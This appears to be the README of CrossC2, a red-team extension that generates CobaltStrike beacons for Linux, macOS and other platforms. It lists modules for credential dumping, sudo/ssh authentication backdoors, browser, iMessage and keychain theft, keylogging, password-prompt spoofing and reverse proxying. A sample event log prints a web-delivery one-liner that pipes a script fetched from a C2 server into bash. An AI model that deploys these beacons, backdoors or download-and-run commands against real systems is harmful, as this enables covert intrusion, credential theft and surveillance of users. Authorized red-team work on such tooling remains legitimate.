A security framework for enterprises and Red Team personnel, supports CobaltStrike’s penetration testing of other platforms (Linux / MacOS / …), supports custom modules, and includes some commonly used penetration modules.
Only for internal use by enterprises and organizations, this framework has a certain degree of instability. Non-professionals are not allowed to use it. Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.
|Run Env (x86)||√|
|Run Env (x64)||√||√||√|
|gen beacon (x86)||√||√|
|gen beacon (x64)||√||√|
|gen beacon (armv7)||⍻||√|
|gen beacon (arm64)||√||√|
|gen beacon (mips[el])||⍻|
- CobaltStrike: currently only supports the last version of cs 3.14(bug fixs).
- Linux: For particularly old systems, you can choose “Linux-GLIBC” option in cna (around 2010)
- MacOS: Latest systems only support 64-bit programs
- iOS: sandbox, restricted cmd
- Embedded: only *nix
- ⍻ : Loader is still in progress
(If it is a Windows system, download genCrossC2.Win.exe)
CrossC2.cna(If successfully installed, the menu bar will have an additional item
- Modify the
genCC2path in the
CrossC2.cnascript to the real path
77: $genCC2 = "/xxx/xx/xx/genCrossC2.MacOS"; # <-------- fix
Create listener and copy key:
For some reasons, only HTTPS beacon is currently supported.
.cobaltstrike.beacon_keys from the cs directory on the server to the local directory.
Reference documents: Wiki
Module: API introduction Wiki
It adopts the method of loading memory without landing, and supports dynamic libraries (.so/.dylib) and executable files (ELF/MachO).
⚠️: Although the file is loaded directly from memory, the process can be viewed in ps when the executable file is passed in, but the process name can be customized.
The type of output information can be freely specified at the time of execution. The return type has been predetermined and can be docked with the native return data type of CS.
⚠️: For special data types, such as passwords, port scan results, etc., please refer to the information returned by the native function of cs, which will be matched according to the regular.
- Password dump module: cc2_mimipenguin uses the open source project MimiPenguin2.0, see CrossC2Kit/ mimipenguin/mimipenguin.cna
- Authentication backdoor modules: cc2_auth, cc2_ssh sudo / su / passwd and other authentication backdoors, ssh is connected and the credentials to connect to other hosts will be recorded.
- Information collection modules: cc2_safari_dump, cc2_chrome_dump, cc2_iMessage_dump, cc2_keychain_dump access records of common browsers, as well as iMessage chat content and authentication credentials saved in the keychain will be obtained.
- Traffic proxy module: cc2_frp supports fast TCP/KCP(UDP) reverse socks5 encrypted traffic proxy.
- Keylogger module: cc2_keylogger records user’s keyboard input.
- Network detection module: cc2_portscan, cc2_serverscan for port scanning and service version scanning.
- Privilege promotion module: cc2_prompt_spoof induces deception to obtain user account password.
- Task management module: cc2_job manages the modules running in memory.
Custom communication protocol: API introduction Wiki
Can more easily realize C2Profile configuration and custom communication protocol TCP / UDP and so on.
Lateral movement: Usage Wiki
Menu Bar: CrossC2 -> CrossC2 Payload Generator -> genCrossC2 Can be configured in the pop-up dialog: 1. Select beacon_key (the path cannot contain spaces, the problem is not solved yet) 2. A dynamic library of custom communication protocols that needs to be bound to beacon 3. Payload type (Staged generated shellcode requires stagerServer)
The information status will be prompted in the event interface during generation
05/01 23:31:03 *** /mnt/cc2/genCrossC2.MacOS 172.16.251.1 5555 /tmp/beacon_keys null MacOS x64 /tmp/CrossC2-test 05/01 23:31:06 *** genCrossC2 beacon -> *[success] : Packed 1532232 byte. 05/01 23:31:07 *** hook hosted CrossC2 beacon MacOS x64 @ http://172.16.251.1:55413/iqEBVKwHoZ 05/01 23:31:07 *** hook hosted Script Unix Web Delivery (curl) @ http://172.16.251.1:55413/a 05/01 23:31:07 *** CrossC2 MacOS x64: curl -A o -o- -L http://172.16.251.1:55413/a | bash -s
- Rich C2Profile support ✔︎ (Choose custom HTTP module when CNA generates beaocn)
- Staged Type Shellcode Generation ✔︎ (Only Linux is temporarily supported, and stagerServer needs to be started on the server)
- http-proxy (auth) & socks proxy back connection support
- Proxy-Pivots ✔︎ (Temporarily adopt the method of connecting back to socks proxy)
- node beacon? (Single node type, can host other beacon without relying on teamserver)
Develop dynamic libraries and customize data return types, such as implementing some built-in functions.